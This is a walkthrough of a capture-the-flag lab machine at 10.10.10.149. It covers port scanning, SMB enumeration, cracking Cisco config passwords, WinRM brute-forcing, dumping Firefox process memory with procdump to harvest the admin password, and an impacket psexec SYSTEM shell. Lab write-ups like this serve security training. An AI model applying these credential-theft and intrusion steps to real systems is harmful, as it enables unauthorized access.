We gather a few creds from a cisco router configuration after login in as guest to the application on port 80
Enumerated the box using enum4linux, smbmap and smbclient and was able to get two additional users
The box has port 5985 opened so decided to test all users and passwords to see if any of the combination was successful and was able to get a shell.
On the privilege escalation, I was not able to get much from Watson, Sherlock, winPEAS, PowerUp All-Checks or basic manual enumeration. However I noticed the box had Firefox listed in the process list, therefore, i decided to do a process dump using the Microsoft Sysinternals.
After analyzing the output file from the dump, I was able to get the password from the Administrator and login using evil-winrm.
Nmap
nmap -p- 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-09 22:24 EDT
Nmap scan report for 10.10.10.149
Host is up (0.041s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
5985/tcp open wsman
49668/tcp open unknown
nmap -sC -sV -p 80,135,445,5985,49668 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-09 22:27 EDT
Nmap scan report for 10.10.10.149
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 45s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-10T02:28:53
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.32 seconds
Enumerating SMB
I used smbmap, smbclient, enum4linux and crackmapexec and was not able to get anything.
Going to http://10.10.10.149 redirects to http://10.10.10.149/login.php. I tried admin/admin and a few other combinations but nothing worked. However there is a "Login as guest" button and I was bale to login.
There user Hazard has attached the configuration of a Cisco router.
The configuration of the Cisco router has some encrypted passwords and usernames.
Decrypting the Cisco Passwords
User: rout3rPassword: $uperP@ssword
User: adminPassword: Q4)sJu\Y8qz*A3?d
The enable secret: stealth1agent
Enumerating SMB Again
With the new credentials obtained I enumerated smb, using smbmap, smbclient, enum4linux and crackmapexec I was bale to get two additional usernames using enum4linux
Using metasploit winrm_login module to see to brute force creds. For some weird reason crackmapexec smb and winrm modules were not successful and were generating a lot of errors.
Enumerating winrm
I tried to brute force the winrm login creds with crackmapexec using its winrm module but it was failing, there I decided to sue metasploit winrm_login auxiliary module.
The specific tool we are interested in is ProcDump.
ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. ProcDump also includes hung window monitoring (using the same definition of a window hang that Windows and Task Manager use), unhandled exception monitoring and can generate dumps based on the values of system performance counters. It also can serve as a general process dump utility that you can embed in other scripts.
Started with the first process which is using PID 752
C:\Users\Chase\documents> .\procdump64.exe -ma 752
ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[02:50:41] Dump 1 initiated: C:\Users\Chase\documents\firefox.exe_200310_025041.dmp
[02:50:41] Dump 1 writing: Estimated dump file size is 484 MB.
[02:50:45] Dump 1 complete: 485 MB written in 3.6 seconds
[02:50:45] Dump count reached.
Transferred the file to my Kali box using evil-winrm
Got some creds from the dump:
User: admin@support.htbPassword: 4dD!5}x/re8]FBuZ
Using evil-winrm to test those creds with the Administrator user confirms that was the correct password.
Got a shell as SYSTEM
psexec.py Administrator:'4dD!5}x/re8]FBuZ'@10.10.10.149
Impacket v0.9.21.dev1+20200225.153700.afe746d2 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.149.....
[*] Found writable share ADMIN$
[*] Uploading file xvhnmTQR.exe
[*] Opening SVCManager on 10.10.10.149.....
[*] Creating service lCrZ on 10.10.10.149.....
[*] Starting service lCrZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
